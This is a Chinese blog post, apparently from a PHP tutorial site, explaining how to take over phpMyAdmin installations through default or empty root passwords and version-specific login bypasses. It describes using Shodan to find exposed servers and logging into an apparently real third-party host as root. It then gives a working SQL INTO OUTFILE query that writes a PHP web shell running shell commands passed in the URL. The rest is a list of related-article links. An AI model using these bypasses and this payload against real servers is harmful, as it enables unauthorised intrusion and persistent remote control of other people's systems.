phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
php下实现农历日历的代码
Mar 07 PHP
php中的实现trim函数代码
Mar 19 PHP
php学习 字符串课件
Jun 15 PHP
关于尾递归的使用详解
May 02 PHP
解析二进制流接口应用实例 pack、unpack、ord 函数使用方法
Jun 18 PHP
PHP里的单例类写法实例
Jun 25 PHP
完美利用Yii2微信后台开发的系列总结
Jul 18 PHP
php实现的中秋博饼游戏之绘制骰子图案功能示例
Nov 06 PHP
PHP5.0~5.6 各版本兼容性cURL文件上传功能实例分析
May 11 PHP
浅谈laravel orm 中的一对多关系 hasMany
Oct 21 PHP
PHP+ajax实现上传、删除、修改单张图片及后台处理逻辑操作详解
Feb 12 PHP
PHP解决高并发的优化方案实例
Dec 10 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
微信公众平台开发实现2048游戏的方法
2015/04/15 PHP
php算法实例分享
2015/07/14 PHP
让div层随鼠标移动的实现代码 ie ff
2009/12/18 Javascript
jQuery Ajax提交表单查询获得数据实例代码
2012/09/19 Javascript
js字符串转换成数字与数字转换成字符串的实现方法
2014/01/08 Javascript
JS获取下拉列表所选中的TEXT和Value的实现代码
2014/01/11 Javascript
iframe里使用JavaScript控制主页转向的方法
2015/04/03 Javascript
javascript下拉列表中显示树形菜单的实现方法
2015/11/17 Javascript
基于javascript实现tab选项卡切换特效调试笔记
2016/03/30 Javascript
js判断radiobuttonlist的选中值显示/隐藏其它模块的实现方法
2016/08/25 Javascript
基于JS实现回到页面顶部的五种写法(从实现到增强)
2016/09/03 Javascript
js微信扫描二维码登录网站技术原理
2016/12/01 Javascript
Require.js的基本用法详解
2017/07/03 Javascript
Vue的事件响应式进度条组件实例详解
2018/02/04 Javascript
Angular4 Select选择改变事件的方法
2018/10/09 Javascript
详解vue组件中使用路由方法
2019/02/12 Javascript
使用JavaScript解析URL的方法示例
2019/03/01 Javascript
微信公众平台 发送模板消息(Java接口开发)
2019/04/17 Javascript
layui 实现自动选择radio单选框(checked)的方法
2019/09/03 Javascript
layui-tree实现Ajax异步请求后动态添加节点的方法
2019/09/23 Javascript
JavaScript中的执行环境和作用域链
2020/09/04 Javascript
python自动化报告的输出用例详解
2018/05/30 Python
详解python中list的使用
2019/03/15 Python
Python获取时间戳代码实例
2019/09/24 Python
python中plt.imshow与cv2.imshow显示颜色问题
2020/07/16 Python
CSS3实现DIV圆角效果完整代码
2012/10/10 HTML / CSS
美国南加州的原创极限运动潮牌:Vans(范斯)
2016/08/05 全球购物
读书活动实施方案
2014/03/10 职场文书
2014乡镇干部纪律作风整顿思想汇报
2014/09/13 职场文书
开业庆典活动策划方案
2014/09/21 职场文书
离婚协议书范文2014
2014/10/16 职场文书
2014年出纳工作总结与计划
2014/12/09 职场文书
植树节新闻稿
2015/07/17 职场文书
如何书写民事调解协议书?
2019/06/25 职场文书
使用Navicat Premium工具将oracle数据库迁移到MySQL
2021/05/27 Oracle
Windows11性能真的上涨35%? 桌面酷睿i9实测结果公开
2021/11/21 数码科技